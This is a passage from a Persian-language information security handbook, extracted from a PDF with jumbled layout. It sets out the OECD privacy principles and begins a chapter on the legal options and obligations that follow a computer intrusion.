ﺑﻴﺎﻳﺪ.
ﺍﺻﻞ ﻛﻴﻔﻴﺖ ﺩﺍﺩﻩﻫﺎ
١٢٣
ﻲ ﺟﻤﻊﺁﻭﺭﻱﺷﺪﻩ ﺑﺎﻳﺪ ﻣﺮﺗﺒﻂ ﺑـﺎ ﻫـﺪﻓﻲ
ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼ ﹺ
ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺍﻋﻼﻡ ﺷﺪﻩ ﻭ ﻳﺎ ﺣﻮﺯﻩ-
ﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﻥ ﻫﺪﻑ ﺑﺎﺷﻨﺪ .ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﺑﺎﻳـﺪ ﺩﻗﻴـﻖ،
ﻛﺎﻣﻞ ،ﻭ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ.
ﺍﺻﻞ ﺗﻌﺮﻳﻒ ﻫﺪﻑ
١٢٤
ﻫﺪﻑ ﺍﺯ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ﺑﺎﻳـﺪ ﺩﺭ ﻫﻤـﺎﻥ
ﻟﺤﻈﺔ ﺟﻤﻊﺁﻭﺭﻱ ﺩﺍﺩﻩﻫﺎ ﻭ ﻧﻪ ﺩﻳﺮﺗﺮ ﺍﺯ ﺁﻥ ﻣﺸﺨﺺ ﺑﺎﺷﺪ.
ﺍﺳﺘﻔﺎﺩﻩﻫﺎﻱ ﺑﻌﺪﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺟﻤﻊﺁﻭﺭﻱﺷـﺪﻩ ﺑﺎﻳـﺪ ﺑـﻪ
ﻫﻤﺎﻥ ﺍﻫﺪﺍﻑ ﻣﺤﺪﻭﺩ ﺷـﻮﺩ؛ ﻭ ﺍﮔـﺮ ﻫـﺪﻓﻬﺎﻱ ﺑﻌـﺪﻱ ﺑـﺎ
ﺍﻫﺪﺍﻑ ﺍﻭﻟﻴﻪ ﺳﺎﺯﮔﺎﺭﻱ ﻧﺪﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺍﻳـﻦ ﺗﻐﻴﻴـﺮ ﺍﻫـﺪﺍﻑ ﺭﺍ
& 121 Organization for Economic Cooperation
Development
122 Collection Limitation Principle
123 Data Quality Principle
124 Purpose Specification Principle
١٧٧
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺻﺮﺍﺣﺘﹰﺎ ﺍﻋـﻼﻡ ﻛـﺮﺩ ﻭ ﻧﻴـﺰ ﺍﻋـﻼﻡ ﺭﺿـﺎﻳﺖ ﻓـﺮﺩ ﺑـﺮﺍﻱ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻭﻱ ﺩﺭ ﺍﻫﺪﺍﻑ ﺟﺪﻳﺪ ﺿﺮﻭﺭﻱ ﺍﺳﺖ.
ﺍﺻﻞ ﻣﺤﺪﻭﺩﻳﺖ ﺍﺳﺘﻔﺎﺩﻩ
١٢٥
ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﻧﺒﺎﻳﺪ ﺍﻓﺸﺎ ﺷـﻮﻧﺪ ،ﺩﺭ ﺩﺳـﺘﺮﺱ ﻋﻤـﻮﻡ
ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ،ﻳﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻓﻲ ﻏﻴﺮ ﺍﺯ ﺁﻧﭽﻪ ﻛﻪ ﺍﻋﻼﻡ ﺷـﺪﻩ
ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﺍﺻﻮﻝ ﻗﺒﻞ ﮔﻔﺘـﻪ ﺷـﺪ -ﺑﻜـﺎﺭ ﺭﻭﻧـﺪ،ﻣﮕﺮ:
ﻱ ﻣﺎﻟﻚ ﺍﻃﻼﻋﺎﺕ؛ ﻳﺎ
oﺑﺎ ﺭﺿﺎﻳﺖ ﻓﺮﺩ ﹺ
oﺑﺎ ﻳﻚ ﻣﺠﻮﺯ ﻗﺎﻧﻮﻧﻲ.
ﺍﺻﻞ ﺣﻔﺎﻇﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ
١٢٦
ﺍﺻﻞ ﺑﺎﺯ ﺑﻮﺩﻥ
ﺍﺻﻞ ﭘﺎﺳﺨﮕﻮﻳﻲ
١٢٩
ﻫﺮ ﮔﺮﺩﺁﻭﺭﻧﺪﺓ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻳﺪ ﺩﺭ ﻗﺒـﺎﻝ ﻋﻤـﻞ ﺑـﻪ ﺍﺻـﻮﻝ
ﺫﻛﺮﺷﺪﺓ ﺑﺎﻻ ﭘﺎﺳﺨﮕﻮ ﺑﺎﺷﺪ.
ﺩﺭ ﺭﺍﻫﻜﺎﺭﻫﺎﻱ OECDﺍﺟﺒﺎﺭ ﻗﺎﻧﻮﻥ ﺑﻪ ﭼﺸﻢ ﻧﻤﻲﺧـﻮﺭﺩ ،ﺍﻣـﺎ
ﺩﺭ ﻋﻮﺽ ﻫﻨﮕﺎﻡ ﺑﺮﺭﺳﻲ ﻗﻮﺍﻧﻴﻦ ﻫﺮﻳﻚ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﻋـﻀﻮ ،ﺍﺯ
ﺍﻳﻦ ﻫﺸﺖ ﺍﺻﻞ ﺑﻌﻨﻮﺍﻥ ﺭﺍﻫﺒﺮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ.
ﺑﺮﺍﻱ ﻣﺸﺎﻫﺪﺓ ﻳﻚ ﻓﻬﺮﺳﺖ ﻛﻨﺘﺮﻝ ﺳـﺎﺩﻩ ﺩﺭ ﻣـﻮﺭﺩ ﻣﻌﻴﺎﺭﻫـﺎﻱ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ -ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ
ﻣﻮﺭﺩ ﻣﺸﺘﺮﻳﺎﻥ ﺍﺯ ﺭﻭﻱ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ -
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﻓﺼﻞ ﻳﺎﺯﺩﻫﻢ ﺍﺯ ﻫﻤﻴﻦ ﺑﺨﺶ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ.
١٢٧
ﺑﺎﻳﺪ ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﻠﻲ ﺩﺭﺑﺎﺭﺓ ﺷـﻔﺎﻑ ﺑـﻮﺩﻥ ﺭﺍﻫﻜﺎﺭﻫـﺎ ﻭ
ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎ ﻧﮕﺎﻩ ﺧﺎﺹ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ
ﺑﺎﺷﺪ .ﺑﺎﻳﺪ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺑـﻪ ﺁﺳـﺎﻧﻲ
ﺑﺘﻮﺍﻧﻨﺪ ﻃﺒﻴﻌﺖ ﺩﺍﺩﻩﻫﺎﻱ ﺷﺨﺼﻲ ،ﻫﺪﻑ ﺍﺻﻠﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻭ
ﻫﻤﭽﻨﻴﻦ ﻣﺪﺕ ﻣﺘﻌﺎﺭﻑ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﻣﻌﻴﻦ ﻛﻨﻨﺪ.
ﺍﺻﻞ ﻣﺸﺎﺭﻛﺖ ﻓﺮﺩﻱ
١٢٨
ﻫﺮ ﻛﺴﻲ ﺑﺎﻳﺪ ﺍﻳﻦ ﺣﻖ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ:
o
ﺑﻔﻬﻤــﺪ ﺍﻃﻼﻋــﺎﺗﻲ ﺍﺯ ﻭﻱ ﺩﺭ ﺩﺳــﺖ ﮔﺮﺩﺁﻭﺭﻧــﺪﺓ
ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻳﺎ ﺧﻴﺮ؛
oﺑﺎ ﮔﺮﺩﺁﻭﺭﻧﺪﺓ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺧـﻮﺩ :ﺩﺭ ﻳـﻚ
ﺯﻣﺎﻥ ﻣﻌﻘﻮﻝ ،ﺑﺎ ﻫﺰﻳﻨﻪ ﺍﻱ ﺍﺭﺯﺍﻥ ،ﺑﺎ ﺭﻭﺷﻲ ﻣﻌﻘﻮﻝ،
ﻭ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻳﺶ ﺷـﻔﺎﻑ ﺑﺎﺷـﺪ ﺩﺭ
ﺍﺭﺗﺒﺎﻁ ﺑﺎﺷﺪ؛
oﺍﮔﺮ ﻳﻜﻲ ﺍﺯ ﺩﺭﺧﻮﺍﺳـﺘﻬﺎﻱ ﺑـﺎﻻ ﺭﺩ ﺷـﺪ ﺑـﺮﺍﻱ ﺁﻥ
ﺩﻟﻴﻞ ﺑﺨﻮﺍﻫﺪ ﻭ ﺑﺘﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﻪ ﭼﺎﻟﺶ ﺑﻜﺸﺪ؛ ﻭ
Use Limitation Principle
Security Safeguards Principle
Openness Principle
Individual Participation Principle
125
126
127
128
129 Accountalility Principle
ﺑﺨﺶ ﺳﻮﻡ
ﺩﺍﺩﻩ ﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺎﻳﺪ ﺑﺎ ﺣﻔﺎﻇﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻣﻨﺎﺳـﺐ ﺩﺭ
ﻣﻘﺎﺑﻞ ﺧﻄﺮﺍﺗﻲ ﺍﺯ ﻗﺒﻴﻞ ﻧﺎﻗﺺ ﺷﺪﻥ ،ﺩﺳﺘﺮﺳﻲ ،ﺗﺨﺮﻳﺐ،
ﺗﻐﻴﻴﺮ ،ﺍﻓﺸﺎ ،ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﻏﻴﺮﻣﺠﺎﺯ ﻣﺮﺍﻗﺒﺖ ﺷﻮﻧﺪ.
oﺑﺘﻮﺍﻧﺪ ﺩﺭﺑﺎﺭﺓ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺑﺤﺚ ﻛﻨﺪ ﻭ
ﺍﮔﺮ ﺩﺭ ﺑﺤﺚ ﻣﻮﻓﻖ ﺷـﺪ ﻗـﺎﺩﺭ ﺑﺎﺷـﺪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ
ﺣﺬﻑ ،ﺍﺻﻼﺡ ﻭ ﻳﺎ ﺗﻜﻤﻴﻞ ﻧﻤﺎﻳﺪ.
١٧٩
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﭘﺮﺩﺍﺧﺖ ١٣٠.ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺩﺳﺘﺮﺳـﻲ ﺟﻬـﺎﻧﻲ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ،ﻭﺟـﻮﺩ
ﻗـﻮﺍﻧﻴﻨﻲ ﻛـﻪ ﺍﺯ ﺩﺍﺧــﻞ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻧــﺸﺄﺕ ﻧﮕﺮﻓﺘـﻪﺍﻧــﺪ ﺭﺍ
ﺿﺮﻭﺭﻱ ﻛﺮﺩﻩ ﺍﺳﺖ.
ﻓﺼﻞ ﻧﻬﻢ
ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ
ﻛﻠﻴﺎﺕ
ﮔﺰﻳﻨﻪﻫﺎﻱ ﺣﻘﻮﻗﻲ ﻣﻮﺟﻮﺩ ﺩﺭ ﭘﻲ ﻭﻗﻮﻉ ﻳﻚ ﻧﻔﻮﺫ
ﺍﮔﺮ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﻤﺎ ﺩﺭ ﺍﺛﺮ ﻧﻔﻮﺫ ﺩﭼﺎﺭ ﺁﺳﻴﺐ ﺷﻮﻧﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺩﺭ ﺳﻴﺴﺘﻢ ﺣﻘﻮﻗﻲ ﻭ ﻗﺎﻧﻮﻧﻲ ﻛﺸﻮﺭ ﻣﺤﻞ ﺍﻗﺎﻣﺘﺘﺎﻥ ﮔﺰﻳﻨـﻪﻫـﺎﻱ
ﻣﺘﻌﺪﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺍﻳﻦ
ﻓﺼﻞ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﺍﺳﺘﻔﺎﺩﺓ ﺩﻗﻴﻖ ﺍﺯ ﺟﻨﺒﻪﻫﺎﻱ ﻣﺨﺘﻠـﻒ
ﻗﺎﻧﻮﻥ ﻳﺎﺭﻱ ﻛﻨـﺪ ،ﭼﺮﺍﻛـﻪ ﺩﺭ ﻗـﻮﺍﻧﻴﻦ ﻭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺣﻘـﻮﻗﻲ
ﻛﺸﻮﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺗﻔﺎﻭﺗﻬﺎﻱ ﺯﻳـﺎﺩﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ .ﻟـﺬﺍ ﺩﺭ ﺍﻳـﻦ
ﻓﺼﻞ ﺑـﻪ ﭼﻴـﺰﻱ ﻓﺮﺍﺗـﺮ ﺍﺯ ﻗـﻮﺍﻧﻴﻦ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﻧﺨـﻮﺍﻫﻴﻢ
ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﭼﺎﺭﻩﺍﻱ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻣﻠـﺰﻡ ﺑـﻪ
ﻼ:
ﺍﻧﺠﺎﻡ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺑﺎﺷﻴﺪ .ﻣﺜ ﹰ
•
ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﺑﺮﺍﻱ ﺷﺮﻛﺖ ﺑﻴﻤﻪ ﺍﺩﻋﺎﻧﺎﻣﻪﺍﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴﺪ
ﺗﺎ ﺧﺴﺎﺭﺗﻲ ﻛﻪ ﺩﺭ ﺍﺛﺮ ﻳﻚ ﻧﻔـﻮﺫ ﺑـﻪ ﺷـﻤﺎ ﻭﺍﺭﺩ ﺷـﺪﻩ ﺭﺍ
ﺟﺒﺮﺍﻥ ﻛﻨﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺟﺎﻧﺐ ﺷﺮﻛﺖ ﺑﻴﻤﻪ ﻣﻠﺰﻡ ﺑﻪ
ﺍﻧﺠﺎﻡ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﻋﻠﻴﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺷﻮﻳﺪ.
•
ﺍﮔﺮ ﺍﻃﻼﻋﺎﺕ ﺧﺎﺹ ﻭ ﻃﺒﻘﻪﺑﻨﺪﻱ ﺷـﺪﻩﺍﻱ ﺭﺍ ﭘـﺮﺩﺍﺯﺵ
ﻣﻲﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻗﻮﺍﻧﻴﻦ ﺩﻭﻟﺘـﻲ ﺷـﻤﺎ ﺭﺍ ﻣﻠـﺰﻡ ﺑـﻪ
ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﻭ ﺍﺭﺍﺋـﻪ ﮔـﺰﺍﺭﺵ ﺩﺭ ﻣـﻮﺭﺩ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ
ﻣﺸﻜﻮﻙ ﻛﻨﻨﺪ.
•
ﺍﮔﺮ ﺍﺯ ﻳﻚ ﻓﻌﺎﻟﻴﺖ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺁﮔﺎﻩ ﺷﻮﻳﺪ ﻭ ﺁﻧﺮﺍ ﮔـﺰﺍﺭﺵ
ﻧﻜﻨﻴﺪ ﺍﺯ ﻧﻈﺮ ﻗﺎﻧﻮﻥ ﺑﻌﻨﻮﺍﻥ "ﻣﻌﺎﻭﻧﺖ ﺩﺭ ﺟﺮﻡ" ﻣـﺴﺌﻮﻟﻴﺖ
ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ ،ﺑﺨﺼﻮﺹ ﺍﮔـﺮ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﻫـﻢ ﺩﺭ ﺁﻥ
ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ.
•
ﺍﮔﺮ ﺍﺯ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻛﺎﺭﻫـﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ ﻭ
ﻧﺎﺩﺭﺳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ ﻭ ﺷﻤﺎ ﺩﺭ ﻗﺒﺎﻝ ﺁﻥ ﻛـﺎﺭﻱ ﻧﻜﻨﻴـﺪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺧﺎﻃﺮ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﻋﻠﻴـﻪ ﺷـﻤﺎ
ﺷﻜﺎﻳﺖ ﻛﻴﻔﺮﻱ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ.
•
ﺍﮔﺮ ﻣﺪﻳﺮ ﺍﺟﺮﺍﻳﻲ ﻳﻚ ﺷﺮﻛﺖ ﺩﻭﻟﺘـﻲ ﺑﺎﺷـﻴﺪ ﻭ ﺗـﺼﻤﻴﻢ
ﺑﮕﻴﺮﻳﺪ ﻛـﻪ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻏﻴﺮﻗـﺎﻧﻮﻧﻲ ﺭﺍ ﺗﺤـﺖ ﭘﻴﮕـﺮﺩ ﻭ
ﺗﺠﺴﺲ ﻗﺮﺍﺭ ﻧﺪﻫﻴﺪ ،ﺳﻬﺎﻣﺪﺍﺭﺍﻥ ﺷﺮﻛﺖ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ
ﻋﻠﻴﻪ ﺷﻤﺎ ﺍﻗﺎﻣﺔ ﺩﻋﻮﻱ ﻛﻨﻨﺪ.
١٣٠ﻳﻚ ﻣﺒﺎﺣﺜﺔ ﮔﺴﺘﺮﺩﻩﺗﺮ ﺩﺭ ﻣﻮﺭﺩ ﻣﺒﺎﺣﺚ ﺣﻘﻮﻗﻲ ﻭ ﻗـﺎﻧﻮﻧﻲ ﺩﺭ ﺍﻳـﺎﻻﺕ
ﻣﺘﺤﺪﻩ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻛﺘﺎﺏ "ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ" ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩ:
)A Crimefighter's Handbook (O'Reilly
ﻣﺎ ﺗﻮﺻﻴﻪ ﻣﻲﻛﻨﻴﻢ ﭼﻨﺎﻧﭽﻪ ﺩﺭ ﻣﻮﺭﺩ ﻣﻄﺎﻟﺒﻲ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺁﻧﻬـﺎ
ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﻴﻢ ﺑﻪ ﺗﻮﺿﻴﺤﺎﺕ ﺑﻴﺸﺘﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺑﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﻣﺮﺍﺟﻌﻪ
ﻛﻨﻴﺪ .ﻛﺘﺎﺏ ﻓﻮﻕ ﺩﻳﮕﺮ ﺑﻪ ﭼﺎﭖ ﻧﻤﻲﺭﺳﺪ ،ﻭﻟﻲ ﻛﭙﻲﻫﺎ ﻭ ﻧـﺴﺨﻪﻫـﺎﻱ
ﻗﺪﻳﻤﻲ ﺁﻥ ﻣﻮﺟﻮﺩ ﻫﺴﺘﻨﺪ.
ﺑﺨﺶ ﺳﻮﻡ
ﺍﻣﻴﺪﻭﺍﺭﻳﻢ ﻫﻴﭽﻮﻗﺖ ﻣﺠﺒﻮﺭ ﻧﺸﻮﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺍﻃﻼﻋﺎﺕ ﻣﻮﺟـﻮﺩ
ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﻋﻤﻞ ﻛﻨﻴﺪ .ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﻛﺘﺎﺏ ﺭﺍ ﺑﺎ ﻛﻮﺷـﺶ
ﻓﺮﺍﻭﺍﻥ ﻣﻄﺎﻟﻌﻪ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﻭ ﻫﻤﺔ ﮔﺎﻣﻬﺎﻱ ﻣﻬﻢ ﺩﺭ ﺟﻬﺖ ﺣﻔﻆ
ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺮﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ،ﺍﻣﺎ ﺑﺎ ﺗﻤـﺎﻡ ﺍﻳـﻦ ﺍﺣـﻮﺍﻝ
ﻫﻤﭽﻨﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ
ﻼ ﻛﺎﺭﻣﻨﺪ ﺷﻤﺎ ﺑﻮﺩﻩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ
ﺑﮕﻴﺮﺩ .ﺷﺎﻳﺪ ﻓﺮﺩﻱ ﻛﻪ ﻗﺒ ﹰ
ﺣﺴﺎﺏ ﻗﺪﻳﻤﻲ ﺑﻪ ﺳﻴﺴﺘﻢ ﻧﻔـﻮﺫ ﻭ ﺑﻌـﻀﻲ ﺍﺯ ﺳـﻮﺍﺑﻖ ﺭﺍ ﺣـﺬﻑ
ﻛﻨﺪ .ﻋﻠﻴﺮﻏﻢ ﺗﻤﺎﻡ ﺗﻼﺷﻬﺎﻱ ﺷﻤﺎ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﻋﻤﻠﻴـﺎﺕ
ﻧﻔﻮﺫ ،ﺷﺎﻳﺪ ﻓﺮﺩﻱ ﺍﺯ ﻳﻚ ﻛﺸﻮﺭ ﺧﺎﺭﺟﻲ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷـﻤﺎ
ﻭﺍﺭﺩ ﺷﻮﺩ .ﺩﺭ ﺍﻳﻦ ﺷﺮﺍﻳﻂ ﺷﻤﺎ ﭼﻪ ﻣﺪﺭﻛﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺑﻪ ﺩﺍﺩﮔﺎﻩ
ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷـﺖ؟ ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﻣـﻲﺗـﻮﺍﻥ ﭘﺮﺳـﻴﺪ
ﻫﻨﮕﺎﻣﻲ ﻛﻪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﺓ ﻋﺎﺩﻱ ﻣﻲﻛﻨﻴﺪ ،ﭼﻪ ﺧﻄﺮﺍﺗـﻲ ﺍﺯ
ﺟﺎﻧﺐ ﻗﺎﻧﻮﻥ ﻭ ﺳﻴﺴﺘﻢ ﺣﻘﻮﻗﻲ ﺷﻤﺎ ﺭﺍ ﺗﻬﺪﻳـﺪ ﻣـﻲﻛﻨﻨـﺪ؟ ﺍﮔـﺮ
ﻫﺪﻑ ﻳﻚ ﺷﻜﺎﻳﺖ ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻳﺪ ﭼﻪ ﻣﻲﻛﻨﻴﺪ؟ ﺍﻳﻦ ﻓﺼﻞ
ﺗﻼﺵ ﺩﺍﺭﺩ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺭﺍ ﺭﻭﺷﻦ ﻛﻨـﺪ .ﺑـﻪ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ
ﻓﺼﻞ ﺑﻴﺎﻥ ﺷﺪﻩ ﺻﺮﻓﹰﺎ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻛﻠﻲ ﺗﻮﺟﻪ ﻛـﺮﺩ
ﻭ ﻧﻪ ﻣﺴﺎﺋﻞ ﻗﺎﻧﻮﻧﻲ ﻭ ﺣﻘﻮﻗﻲ؛ ﭼﺮﺍﻛﻪ ﺑـﺮﺍﻱ ﺟﺰﺋﻴـﺎﺕ ﺑﻴـﺸﺘﺮ ﻭ
ﻣﺴﺎﺋﻞ ﺭﻳﺰﺗﺮ ﺑﺎﻳﺪ ﺍﺯ ﻭﻛﻼﻱ ﺧﻮﺏ ﻭ ﻣﺸﺎﻭﺭﺍﻥ ﺣﻘﻮﻗﻲ ﻣﺠـﺮﺏ
ﺑﺨﻮﺍﻫﻴـﺪ ﺑـﺮ ﺣــﺴﺐ ﻗـﻮﺍﻧﻴﻦ ﻛـﺸﻮﺭ ﻣﺤــﻞ ﺍﻗﺎﻣﺘﺘـﺎﻥ ﺷــﻤﺎ ﺭﺍ
ﺭﺍﻫﻨﻤﺎﻳﻲ ﻛﻨﻨﺪ.
ﻗﺒﻞ ﺍﺯ ﻫﺮﮔﻮﻧﻪ ﺗﺼﻤﻴﻢ ﺑﻪ ﺁﻏﺎﺯ ﻣﺮﺍﺣﻞ ﻗﺎﻧﻮﻧﻲ ﺑـﺎ ﻳـﻚ ﻭﻛﻴـﻞ
ﺯﺑﺪﻩ ﻣﺸﻮﺭﺕ ﻛﻨﻴﺪ .ﭼﻮﻥ ﺩﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﻳﻜﺮﺩﻫـﺎﻱ ﻗـﺎﻧﻮﻧﻲ
ﺧﻄﺮﺍﺕ ﻭ ﻣﺸﻜﻼﺗﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ،ﺑﺎﻳـﺪ ﻗﺒـﻞ ﺍﺯ ﺷـﺮﻭﻉ ﭘﻴﮕـﺮﺩ
ﻗﺎﻧﻮﻧﻲ ﻧﺴﺒﺖ ﺑﻪ ﺍﻧﺠﺎﻡ ﺁﻥ ﻣﻄﻤﺌﻦ ﺑﺎﺷﻴﺪ.
١٨٠
•
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﮔﺮ ﻣﺪﻳﺮ ﺍﺟﺮﺍﻳﻲ ﻳﻚ ﺷﺮﻛﺖ ﺧـﺼﻮﺻﻲ ﺑﺎﺷـﻴﺪ ،ﺣﺘـﻲ
